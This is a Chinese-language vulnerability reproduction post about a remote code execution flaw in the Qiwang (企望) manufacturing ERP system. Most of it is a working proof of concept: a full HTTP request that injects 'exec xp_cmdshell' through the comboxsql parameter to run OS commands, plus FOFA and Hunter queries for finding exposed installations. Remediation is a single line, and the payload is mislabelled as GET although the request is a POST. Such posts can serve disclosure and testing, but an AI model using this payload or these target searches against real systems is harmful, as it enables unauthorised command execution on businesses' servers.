企望制造ERP系统RCE漏洞 复现

文章目录

• [企望制造ERP系统RCE漏洞 复现](#企望制造ERP系统RCE漏洞 复现)
• • [0x01 前言](#0x01 前言)
  • [0x02 漏洞描述](#0x02 漏洞描述)
  • [0x03 影响平台](#0x03 影响平台)
  • [0x04 漏洞环境](#0x04 漏洞环境)
  • [0x05 漏洞复现](#0x05 漏洞复现)
  • • 1.访问漏洞环境
    • 2.构造POC
    • 3.复现
  • [0x06 修复建议](#0x06 修复建议)

企望制造ERP系统RCE漏洞 复现

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

企望制造纸箱行业ERP系统涉及纸箱企业管理的各个方面，包括成本核算，报价定价，订单下达，生产排单，现场管理，成品入库，出货配送，全业务流程财务结算，质量管理贯穿始终，将纸箱企业管理水平提升到一个全新的高度，实现精确计算，合理规划，高效监管、分工合作、充分沟通的管理理念。

在/mainFunctions/comboxstore.action路径下，该网站存在RCE漏洞。

0x03 影响平台

企望ERP系统

0x04 漏洞环境

fofa：title="企望制造ERP系统"
hunter：app.name="企望制造ERP"

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （GET）

POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

3.复现

发现命令成功执行，响应成功！！！

0x06 修复建议

建议及时更新至最新版本！